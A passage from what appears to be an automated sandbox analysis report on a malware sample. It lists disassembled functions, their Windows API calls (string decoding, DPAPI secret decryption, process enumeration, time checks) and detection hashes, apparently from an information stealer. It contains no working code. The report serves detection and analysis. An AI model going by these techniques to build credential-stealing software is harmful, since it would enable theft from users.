                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0079EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: c0312d5736ca6d42223d19014011437c571597c42eaa975b94d477d3d3699340
                              • Instruction ID: 08fbeda870d2f9e001113314a3496416745759965cc46c19c2991f87635b974b
                              • Opcode Fuzzy Hash: c0312d5736ca6d42223d19014011437c571597c42eaa975b94d477d3d3699340
                              • Instruction Fuzzy Hash: 2B122071910118EBDB55FB60DC9AEEE7378AF95300F4042A9B50B96091EF3C6F49CB92
                              Function 00799AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ny,00000000,00000000), ref: 00799AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00794EEE,00000000,?), ref: 00799B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ny,00000000,00000000), ref: 00799B2A
                              • LocalFree.KERNEL32(?,?,?,?,00794EEE,00000000,?), ref: 00799B3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID: Ny
                              • API String ID: 4291131564-2735882127
                              • Opcode ID: 91717a0b743027a496fa87ae99e748f2ac4c8fb930aab9673085da411fe3c34a
                              • Instruction ID: 58129580f0453c5c8563ffa2542b4aa7d2bbe06b5b7484c5dab28374e125e716
                              • Opcode Fuzzy Hash: 91717a0b743027a496fa87ae99e748f2ac4c8fb930aab9673085da411fe3c34a
                              • Instruction Fuzzy Hash: E811AFB4241208AFEB10CFA4DC95FAA77B5FB89700F208059FE159B390C7B6A951DB90
                              Function 0079C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0079C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0079C87C
                              • lstrcat.KERNEL32(?,007B0B46), ref: 0079C943
                              • lstrcat.KERNEL32(?,007B0B47), ref: 0079C957
                              • lstrcat.KERNEL32(?,007B0B4E), ref: 0079C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: f3a81115739a27a7eeee291ac5a64f860affce92dcb9cd660b717c1b5133191b
                              • Instruction ID: c6864136d419841f3243fb721730203cd56918230a9a4a2e35dc59f894ebeec1
                              • Opcode Fuzzy Hash: f3a81115739a27a7eeee291ac5a64f860affce92dcb9cd660b717c1b5133191b
                              • Instruction Fuzzy Hash: 08418FB595421ADFDF10CFA0DD89BEEB7B8BB48304F1041A9E509A7280D774AA84DF91
                              Function 007A6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 007A696C
                              • sscanf.NTDLL ref: 007A6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007A69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007A69C0
                              • ExitProcess.KERNEL32 ref: 007A69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: ffd96c11dd20a78c454253b8b14d96589381c33ab9e2c703eb73d77f9120e29a
                              • Instruction ID: 5454c866a8052bad22b86738576559348e23a88738cda16a775a8308dc96fa93
                              • Opcode Fuzzy Hash: ffd96c11dd20a78c454253b8b14d96589381c33ab9e2c703eb73d77f9120e29a
                              • Instruction Fuzzy Hash: EC21EB75D14208ABCF04EFE4D949AEEB7B9BF48300F04852EE416E3250EB345614DB69
                              Function 00797240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0079724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00797254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00797281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 007972A4
                              • LocalFree.KERNEL32(?), ref: 007972AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: ad024a6859d4423063673ea05c25ce45db9b934b0bb51ee77d0df75be61e3f6a
                              • Instruction ID: 7ab983b0032c1691feb4f149cce875415083738955eea3a025ccfe3f118095f7
                              • Opcode Fuzzy Hash: ad024a6859d4423063673ea05c25ce45db9b934b0bb51ee77d0df75be61e3f6a
                              • Instruction Fuzzy Hash: C7019EB1B94208BBEB10CFD4CD4AF9E77B8FB04B00F104055FB05AB2C0C6B0AA409BA5
                              Function 007A9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007A961E
                              • Process32First.KERNEL32(007B0ACA,00000128), ref: 007A9632
                              • Process32Next.KERNEL32(007B0ACA,00000128), ref: 007A9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 007A965C
                              • CloseHandle.KERNEL32(007B0ACA), ref: 007A967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: c73bcb58465accdb96f35682e811d33f8f1477eb7c68241634494cfa545a328f
                              • Instruction ID: 0cf41e90a61431c016eb393279d3ce42864864b970559925bee729160a08bfd0
                              • Opcode Fuzzy Hash: c73bcb58465accdb96f35682e811d33f8f1477eb7c68241634494cfa545a328f
                              • Instruction Fuzzy Hash: EE011E75A55208EBCB14DFA5CD48BEDB7F8EF48300F104289AA05A7250DB749BA0EF51
                              Function 00B58A98 Relevance: 6.6, Strings: 4, Instructions: 1633COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .7n$>Y_}$ZwN$b9cw
                              • API String ID: 0-1058704848
                              • Opcode ID: 143d90606ca52518c38591cbf598b081b58f58efcabbf27ee4ffcf12ecc072d5
                              • Instruction ID: a4e36c91bac11dbc166177953a750f5e1e4c8e7550204c3fef8064ebbb976b14
                              • Opcode Fuzzy Hash: 143d90606ca52518c38591cbf598b081b58f58efcabbf27ee4ffcf12ecc072d5
                              • Instruction Fuzzy Hash: 27B208F3A0C2109FE304AE2DEC8567ABBE9EF94720F16853DEAC4C7744E93558058796
                              Function 00B50605 Relevance: 6.5, Strings: 4, Instructions: 1522COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ?07?$o;$o;$xHw;
                              • API String ID: 0-2117633862
                              • Opcode ID: 053c9fcd03950bfb35da5d662b0571045920a04d829c41e71f7ccc1200251d59
                              • Instruction ID: ab9cd16b26ce9ef2e3350bf8b65f6ff814eebd3eb8d58b64110f6d944c8c5a8b
                              • Opcode Fuzzy Hash: 053c9fcd03950bfb35da5d662b0571045920a04d829c41e71f7ccc1200251d59
                              • Instruction Fuzzy Hash: 20B2E2F390C2049FE314BE29EC8567AFBE5EF94720F1A492DEAC487744E63558458B83
                              Function 007A8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00795184,40000001,00000000,00000000,?,00795184), ref: 007A8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 62c8cb15a836b572f1862b44967db13e381a3812281d85e71b855f424cfaa718
                              • Instruction ID: c9142c880ad801ebfb79f79a50d740849434ffb629e3dccbeecedab0b309ada1
                              • Opcode Fuzzy Hash: 62c8cb15a836b572f1862b44967db13e381a3812281d85e71b855f424cfaa718
                              • Instruction Fuzzy Hash: 2C110A70204205EFDB40CF64D884FA737A9AF8A300F109648F9158B250DB39EC91EB61
                              Function 007A7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,014CDEA8,00000000,?,007B0E10,00000000,?,00000000,00000000), ref: 007A7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,014CDEA8,00000000,?,007B0E10,00000000,?,00000000,00000000,?), ref: 007A7A7D
                              • wsprintfA.USER32 ref: 007A7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: c8835f309e5cf9d2a650c655760cea20d10bfa2974fc4f0998cdebace8070ea3
                              • Instruction ID: eadeb6b79f95e4b6b75945b5df7e1c1bb16b7ee15106c6e9eb94074f97f15169
                              • Opcode Fuzzy Hash: c8835f309e5cf9d2a650c655760cea20d10bfa2974fc4f0998cdebace8070ea3
                              • Instruction Fuzzy Hash: 831182B194A228EBDB208F54DC45F9AB778F745711F10439AE906932C0C7785E40DF51
                              Function 00B5A59C Relevance: 5.4, Strings: 3, Instructions: 1645COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %:{$%u{$UUr1
                              • API String ID: 0-3479111920
                              • Opcode ID: 19300c639fddba81476684ccc582cc233e9db730973d2fa160b23cbbf565924a
                              • Instruction ID: ac5db84be3f1116fdaa99d5229570b878af97c90c001b1f493f48911b4962cb3
                              • Opcode Fuzzy Hash: 19300c639fddba81476684ccc582cc233e9db730973d2fa160b23cbbf565924a
                              • Instruction Fuzzy Hash: 8DB215F3A0C6009FD304AE2DEC8567AFBE5EF94720F1A492DEAC4C7744EA3558018697
                              Function 007A3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(007AE118,00000000,00000001,007AE108,00000000), ref: 007A3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 007A37B0
                              Memory Dump Source
